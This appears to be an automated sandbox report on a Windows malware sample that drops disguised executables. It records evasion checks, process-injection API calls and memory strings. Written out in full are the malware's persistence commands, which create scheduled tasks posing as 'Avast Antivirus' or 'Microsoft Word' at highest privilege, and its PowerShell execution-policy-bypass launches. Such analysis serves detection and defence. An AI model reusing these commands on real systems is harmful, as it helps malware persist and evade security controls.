Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 9920Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 10196Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe TID: 1728Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe TID: 6888Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 3672Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 8564Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 9048Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe TID: 9224Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\xdwdPutty.exe TID: 1688Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UserName FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\ptKNiAaGus.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\xdwdPutty.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeFile opened: C:\Users\user\AppData\Roaming
Source: ptKNiAaGus.exe, 00000000.00000002.3333580070.000000001B79A000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service5
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D683000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition6457
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partitionun?8
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RA
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitiona
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: ptKNiAaGus.exe, 00000000.00000002.3334551857.000000001B836000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"0
Source: ptKNiAaGus.exe, 00000000.00000002.3336517586.000000001BDEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesu
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorrB
Source: pto2q1ow.nf5.exe, 00000013.00000002.3349371031.000000001C1DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor>
Source: pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C044000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor;
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
Source: ptKNiAaGus.exe, 00000000.00000002.3320097217.0000000002CF0000.00000004.00000800.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3321917309.0000000002F74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
Source: pto2q1ow.nf5.exe, 00000013.00000002.3347623385.000000001B982000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dll passwordFormat="Hashed"
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor~8
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processorl(R)
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess token adjusted: Debug
Source: C:\Users\user\xdwdPutty.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\ptKNiAaGus.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: ptKNiAaGus.exe, IPlSSVquzizB.csReference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.gTPIGMjoKzHn()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.WonKffqJoEpSsUk()), typeof(xkmuEWGEmcLRyMY.OpenProcess), ref Parameters)
Source: ptKNiAaGus.exe, IPlSSVquzizB.csReference to suspicious API methods: ctLKvSYSpZJt.RdVUgDBImozuSxE(wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.DWZXpvweMZwNY()), wHyVdneHLsVUKq.iZWyoFPg(ncSubYLaTjDxEKi.BzDdWBETxCu()), typeof(xkmuEWGEmcLRyMY.NtProtectVirtualMemory), ref Parameters)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi))
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num2, length, 12288, 64)
Source: 0.2.ptKNiAaGus.exe.1bad0000.0.raw.unpack, SendToMemory.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num4, data, bufferSize, ref bytesRead)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"'
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"' & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe" Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo 5 /tn "Google Drive" /tr "C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exe" /RL HIGHEST Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe"' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Users\user\xdwdPutty.exe "C:\Users\user\xdwdPutty.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Corel PaintShop Pro" /tr "C:\Users\user\Videos\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess created: unknown unknown
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Azure DevOps" /tr "C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe scHTaSks /Run /I /TN "Avast Antivirus"
Source: C:\Users\user\xdwdPutty.exeProcess created: C:\Windows\System32\cmd.exe "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST & exit
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /create /f /sc minute /mo -1 /tn "Microsoft Word" /tr "C:\Users\user\xdwdPutty.exe" /RL HIGHEST
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmp, pto2q1ow.nf5.exe, 00000013.00000002.3348366187.000000001C010000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>40atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>41atus<@>Program Manager
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E17E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>41atus<@>Program Manager/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0agJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@
Source: pto2q1ow.nf5.exe, 00000013.00000002.3350908929.000000001E1BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Pong<@>40atus<@>Program Manager
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTcpi@.g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager /b !g
Source: ptKNiAaGus.exe, 00000000.00000002.3338723647.000000001D661000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerTcpip_{AC25AD1E-4879-4C9B-BB59-E50724EBEC23}\Device\Tcpip_{60B2689F-C8F6-4D1B-8ED3-6BD4DA58F33E}\Device\Tcpip_{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}Mo
Source: C:\Users\user\Desktop\ptKNiAaGus.exeQueries volume information: C:\Users\user\Desktop\ptKNiAaGus.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
